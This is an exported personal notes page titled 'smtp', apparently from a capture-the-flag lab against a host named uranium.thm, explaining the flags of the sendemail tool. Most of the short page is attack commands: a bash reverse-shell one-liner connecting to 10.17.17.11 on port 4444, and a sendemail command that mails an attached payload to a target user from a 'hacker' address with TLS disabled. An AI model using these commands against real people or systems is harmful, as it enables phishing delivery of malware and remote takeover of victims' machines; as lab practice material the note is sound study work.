<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>smtp</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>smtp</h1>

      <div class="ck-content">
        <p><code>-t </code> is the target user email address, <code>-f</code> is your
          address, <code>-s</code> is mail server, <code>-u</code> is subject, <code>-m</code> is
          the message and -a is the local file/payload to attach</p><pre><code class="language-text-plain">bash -c "bash -i &gt;&amp; /dev/tcp/10.17.17.11/4444 0&gt;&amp;1"</code></pre><pre><code class="language-text-plain">sendemail -t hakanbey@uranium.thm -f hacker@Iminyourcloud.com -s uranium.thm -u "Some other subject" -m "some ther message" -a application -o tls=no</code></pre>
      </div>
    </div>
  </body>

</html>